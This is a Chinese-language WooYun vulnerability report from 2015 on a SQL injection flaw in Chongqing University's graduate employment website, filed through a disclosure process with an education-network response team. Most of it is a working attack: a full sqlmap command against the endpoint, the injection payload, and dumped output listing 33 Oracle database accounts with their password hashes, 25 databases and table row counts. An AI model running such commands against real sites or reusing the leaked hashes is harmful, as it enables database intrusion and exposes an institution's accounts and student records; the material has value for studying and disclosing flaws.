当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153889

漏洞标题:重庆大学毕业生就业信息网某处存在SQL注射漏洞(DBA权限/33名系统管理员密码泄露/25个库/50万网站日志泄露)

相关厂商:重庆大学

漏洞作者: 路人甲

提交时间:2015-11-23 16:28

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

重庆大学毕业生就业信息网某处存在SQL注射漏洞(DBA权限/33名系统管理员密码泄露/25个库/50万网站日志泄露)

详细说明:

地址:http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq

python sqlmap.py -u "http://**.**.**.**/jyxt/loginzphdwzpxx.do?dwloginid=cjzqcq" -p dwloginid --technique=BTU --random-agent --batch --current-user --is-dba --users --passwords -D JYXT --count

漏洞证明:

---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=cjzqcq' AND 7713=7713 AND 'VSni'='VSni
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'JYXT'
current user is DBA: True
database management system users [33]:
[*] ANONYMOUS
[*] BI
[*] CDLJ
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EJOB
[*] EXFSYS
[*] HR
[*] IX
[*] JYXT
[*] JYXT_JK
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SMP_EJOB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZFSMP
database management system users password hashes:
[*] ANONYMOUS [1]:
password hash: anonymous
[*] BI [1]:
password hash: FA1D2B85B70213F3
[*] CDLJ [1]:
password hash: 87680764513B8E5C
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
password hash: 987982A464315484
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
[*] EJOB [1]:
password hash: EA8A0F1F0E191E7D
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] HR [1]:
password hash: 6399F3B38EDF3288
[*] IX [1]:
password hash: 2BE6F80744E08FEB
[*] JYXT [1]:
password hash: D68FF9A6FD93B34A
[*] JYXT_JK [1]:
password hash: 6E345391E05C63D4
[*] MDDATA [1]:
password hash: DF02A496267DEE66
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
password hash: 7560613DBB8DBCCF
[*] OE [1]:
password hash: 9C30855E7E0CB02D
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] PM [1]:
password hash: 72E382A52E89575A
[*] SCOTT [1]:
password hash: F894844C34402B67
[*] SH [1]:
password hash: 9793B3777CD3BD1A
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
[*] SMP_EJOB [1]:
password hash: B7A44AA3696BF99E
[*] SYS [1]:
password hash: C4304C76B736AD40
[*] SYSMAN [1]:
password hash: D5C8644506B19825
[*] SYSTEM [1]:
password hash: F1CEA65CFBD9DEC7
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
[*] ZFSMP [1]:
password hash: B79A1B952A2248C4
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=cjzqcq' AND 7713=7713 AND 'VSni'='VSni
---
web application technology: JSP
back-end DBMS: Oracle
available databases [25]:
[*] CDLJ
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EJOB
[*] EXFSYS
[*] HR
[*] IX
[*] JYXT
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SMP_EJOB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZFSMP
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=cjzqcq' AND 7713=7713 AND 'VSni'='VSni
---
web application technology: JSP
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'JYXT'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: dwloginid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dwloginid=cjzqcq' AND 7713=7713 AND 'VSni'='VSni
---
web application technology: JSP
back-end DBMS: Oracle
Database: JYXT
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| XT_ZDLOG | 501597 |
| WJDC_WJHDB | 182323 |
| ZD_SYXXB_TYSFRZH | 76029 |
| ZD_SYXXB_TMP_TEST1 | 66317 |
| ZD_SYXXB | 65962 |
| ZD_SYXXB_20150619BF | 65949 |
| WJDC_WJDJRB | 41580 |
| CQDX_DWZPGWZYB | 35170 |
| CQDX_JYXXB | 28516 |
| WJDC_DJR_XSK_TMP_TEST1 | 24210 |
| TEST_ZD_SYXXB | 23994 |
| ZD_BDZHB | 23994 |
| ZD_BDZHB_TMP2_TEST1 | 23994 |
| ZD_XYSHB | 20261 |
| ZD_XYXXB | 19711 |
| CQDX_JYXXB_BAK_CQ | 18305 |
| ZDWZ_ZPXXB | 16525 |
| ZD_JYXXB_BAK | 16028 |
| ZDWZ_ZWTJB | 15991 |
| ZD_BDXXB | 15154 |
| ZD_DAXXB | 14606 |
| YAN_ZD_SYXXB | 13108 |
| BEN_ZD_SYXXB | 11538 |
| ZD_DWXXB | 11199 |
| DMK_CODELIST_TMP_TEST1 | 10688 |
| DMK_CODELIST | 10679 |
| ZD_SYXGSQB | 8598 |
| JC_AREA_TEMP | 7678 |
| ZD_20140113 | 7237 |
| ZDWZ_ZPHCDYDB | 7041 |
| ZDWZ_DWZCB | 6425 |
| ZDWZ_DWZPB | 6085 |
| DMK_XX | 5962 |
| WJDC_DJR_XYK_TMP_TEST1 | 5734 |
| XT_ADMINUSER | 5398 |
| XT_USERPURVIEW | 3982 |
| WJ06 | 3964 |
| CQDX_TJXXB | 3806 |
| DMK_CODELIST_BAK | 3543 |
| DMK_CODELIST_NEW | 3543 |
| JC_AREA | 3491 |
| ZD_XY_ZY | 3406 |
| ZD_XYSH_NEW | 2986 |
| ZDWZ_ZCZPHXXB | 2946 |
| ZD_TJB | 2642 |
| ZD_DWXXB_TMP2_TEST1 | 2439 |
| ZD_XYSH_OLD | 2258 |
| ZD_DWXXB_TMP_TEST1 | 1767 |
| ZDWZ_ZPHSQB | 1625 |
| ZDWZ_ZCQTXXB | 1455 |
| ZD_SY_ZY | 1324 |
| A_TEST | 1264 |
| ZD_WYXXB | 1103 |
| CQDX_DWZPGWZYTEMPB | 1075 |
| TEST_ZD_XY_ZY | 988 |
| ZDWZ_ZPTMP | 873 |
| ZD_ZY_TEST | 652 |
| ZD_MYXXB | 489 |
| ZD_XY_ZY_TMP_TEST1 | 392 |
| ZD_DWSSJTB | 373 |
| ZDWZ_ZWLB_MC | 373 |
| ZDWZ_ZWMCB | 336 |
| XT_ROLETOMODEL | 326 |
| ZD_MYXXB_TMP_TEST1 | 326 |
| ZD_WYXXB_BAK | 326 |
| ZD_ZY | 289 |
| CQDX_DCZDSZB | 229 |
| ZD_XY_ZY_TMP2_TEST1 | 225 |
| ZD_MYXXB_TMP2_TEST1 | 200 |
| ZD_ZY_TMP2_TEST1 | 192 |
| XT_SUBMODELTEMP | 148 |
| ZD_ZY_OLD | 142 |
| NEWSCONTENT | 138 |
| JC_SCHOOL | 137 |
| ZDWZ_ZPHCDB | 137 |
| ZD_DA_XSDAQDB | 120 |
| ZD_SJSBB_JSH | 111 |
| TEST_ZD_JYXXB | 102 |
| WJDC_STK_XXB | 101 |
| ZD_JYXGJLB | 87 |
| ZD_ZY_TMP_TEST1 | 87 |
| XT_SUBMODEL | 84 |
| ZD_DAXXB_TMP_TEST1 | 56 |
| ZD_XYSYSB | 52 |
| ZDWZ_ZPXXB_DEL | 50 |
| ZD_SJSBB | 48 |
| DMK_TYPELIST | 47 |
| ZDWZ_HYLBB | 46 |
| NEWS_TMP | 44 |
| DWXZDMB | 39 |
| ZXQY_DWXZDMB | 39 |
| ZDWZ_ZWLBB | 38 |
| ZXQY_QYXXB | 37 |
| ZD_BMZDPZB | 30 |
| WJDC_WJXXXXB | 28 |
| ZD_JYXXB | 24 |
| SH0_TEMP20140912 | 22 |
| ZD_MYXXB_BAK | 22 |
| ZD_SYXGJLB | 21 |
| ZD_SYXGJLB_BAK | 21 |
| ZDWZ_DWZPB_DEL | 19 |
| TEST | 18 |
| WJDC_DJR_XYK_TMP2_TEST1 | 18 |
| XT_MODEL | 18 |
| ZDWZ_CDSQSFXMB | 18 |
| PRINTPAGE | 17 |
| WJDC_STK | 16 |
| XT_ROLE | 16 |
| ZDWZ_ZPHXXB | 14 |
| ZDWZ_CDSFXMB | 13 |
| ZD_XYLXRGXB | 12 |
| ZD_DAB_TMP_TEST1 | 10 |
| ZD_ZNXWB | 9 |
| WJDC_STLXDMB | 8 |
| YW_DATELIST | 8 |
| ZD_BMQTXXB | 8 |
| ZD_BMXMB | 8 |
| ZD_YJMBB | 8 |
| WJDC_WJLJB | 7 |
| ZD_DA_DAQDB | 7 |
| ZD_WJGLB | 7 |
| TEST_TEMP1 | 6 |
| ZD_YXYHB | 6 |
| ZD_SYXXB_TMP2_TEST1 | 5 |
| ZD_TJXXB | 5 |
| ZDWZ_ZCLXRB | 5 |
| ZXQY_QYDWB | 5 |
| JC_SCHOOLTEMP | 4 |
| ZD_BDZYSCTJB | 4 |
| ZD_DAB_TMP2_TEST1 | 4 |
| ZD_DAXXB_TMP2_TEST1 | 4 |
| ZD_XYXXSZB | 4 |
| ZD_YHDCZDB | 4 |
| CQDX_XXSJRB | 3 |
| CQDX_ZNXXB | 3 |
| WJDC_DZLJB | 3 |
| WJDC_WJJBXXB | 3 |
| ZD_BMGRXXB | 3 |
| ZD_BMXXB | 3 |
| ZD_XYQXXB | 3 |
| WJDC_DJR_XSK_TMP2_TEST1 | 2 |
| ZD_DCZDB | 2 |
| ZD_SJSBB_CHECK | 2 |
| ZD_SYXXB_CHECK | 2 |
| CQDX_WEBSERVICESZB | 1 |
| XT_PARASETTING | 1 |
| YW_SJSZ | 1 |
| ZD_CSSZB | 1 |
| ZD_YHFKB | 1 |
+-------------------------+---------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-24 17:41

厂商回复:

通知处理中

最新状态:

暂无


漏洞评价:

评价